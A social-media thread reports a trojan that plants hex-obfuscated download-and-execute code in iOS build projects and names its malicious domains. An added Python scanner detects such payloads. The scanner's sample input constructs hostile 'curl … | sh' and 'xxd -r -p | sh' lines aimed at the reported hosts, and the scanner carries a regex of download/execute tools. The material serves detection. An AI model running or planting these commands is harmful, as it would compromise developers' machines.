It seems a new trojan is going around and affecting @Apple #iOS builds. I don't know the original method of infection, but I'm starting to see some public repos on GitHub being affected
If you care to de-obfuscate the HEX, it downloads and executes a script from sidelink.xyz/a (a server in Moscow) which in turn downloads a binary from the same site...
Do I know someone besides @k8em0 and @Fox0x01 that could spread a couple of words in the right places?
Kudos to our team @OetkerDigital for first finding this out, and thanks @acquavascia for spreading the word!
Some other variants download from icloudserv DOT com (pointing to the same IP as sidelink DOT xyz)... Still going through some of the variants 😀
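As an added example, not code from the thread or its author: a small scanner that does the hex de-obfuscation mechanically and flags decoded strings that either name the two domains mentioned in the thread (sidelink.xyz, icloudserv.com) or look like a download-and-execute command with a domain not yet on the list. It assumes the obfuscated payload is a contiguous run of hex byte pairs that decodes to ASCII; the sample lines it scans are constructed here to illustrate the pattern and are not taken from any affected repo.

```python
"""Scan text (build scripts, project files) for hex-encoded strings that decode
to download-and-execute commands or to the domains named in the thread.
Added example; the hex-run format and the sample input are assumptions."""
import re
import string

# Domains named in the thread (written defanged there, "icloudserv DOT com").
IOC_DOMAINS = ("sidelink.xyz", "icloudserv.com")

# Assumption: the obfuscated payload is a contiguous run of hex byte pairs
# (at least 32 hex digits), not adjacent to other hex digits.
HEX_RUN = re.compile(r"(?<![0-9A-Fa-f])((?:[0-9A-Fa-f]{2}){16,})(?![0-9A-Fa-f])")

# Commands that fetch or run code; a decoded string matching these is flagged
# even when it names a domain that is not yet on the IOC list.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget|bash|sh|python[23]?|osascript|chmod)\b", re.I)

PRINTABLE = set(string.printable)


def decode_hex_run(hex_text):
    """Return the decoded ASCII text, or None if the bytes are not printable
    (hashes, UUIDs and binary blobs fall out here)."""
    try:
        raw = bytes.fromhex(hex_text)
    except ValueError:
        return None
    decoded = raw.decode("ascii", errors="replace")
    if all(ch in PRINTABLE for ch in decoded):
        return decoded
    return None


def scan_text(text):
    """Return one finding per hex run that decodes to a known IOC domain or to
    a download/execute command: line number, decoded text, matched domains,
    and the reason it was flagged."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for match in HEX_RUN.finditer(line):
            decoded = decode_hex_run(match.group(1))
            if decoded is None:
                continue
            domains = [d for d in IOC_DOMAINS if d in decoded.lower()]
            if not domains and not DOWNLOAD_EXEC.search(decoded):
                continue
            findings.append({
                "line": lineno,
                "decoded": decoded,
                "domains": domains,
                "reason": "ioc-domain" if domains else "download-exec",
            })
    return findings


def _hex(s):
    """Hex-encode a string the way the constructed samples below need it."""
    return s.encode().hex()


# Constructed sample input: shell lines of the kind a run-script build phase
# might contain. None of this is copied from a real affected repository.
SAMPLE = "\n".join([
    "# constructed: obfuscated stage one fetching the script from the thread's domain",
    "echo " + _hex("curl -s http://sidelink.xyz/a | sh") + " | xxd -r -p | sh",
    "# constructed: variant using the second domain from the thread",
    'eval "$(echo ' + _hex("curl -fsSL https://icloudserv.com/a -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a") + ' | xxd -r -p)"',
    "# constructed: unknown domain, caught by the command pattern instead",
    "echo " + _hex("curl http://example.invalid/x | bash") + " | xxd -r -p | sh",
    "# benign: a git commit hash decodes to non-printable bytes and is skipped",
    "COMMIT=3f1e9c0b7a2d4e5f6a7b8c9d0e1f2a3b4c5d6e7f",
    "# benign: printable but harmless, so not reported",
    "echo " + _hex("hello from the build script"),
])


if __name__ == "__main__":
    for f in scan_text(SAMPLE):
        print(f"line {f['line']}: {f['reason']} {f['domains']} -> {f['decoded']!r}")
```

Run against a checkout, the useful targets are project.pbxproj files and any shell, Python or Ruby scripts invoked during the build; the decoded string is what to pivot on, since the hex itself changes between variants while the download-and-execute shape does not.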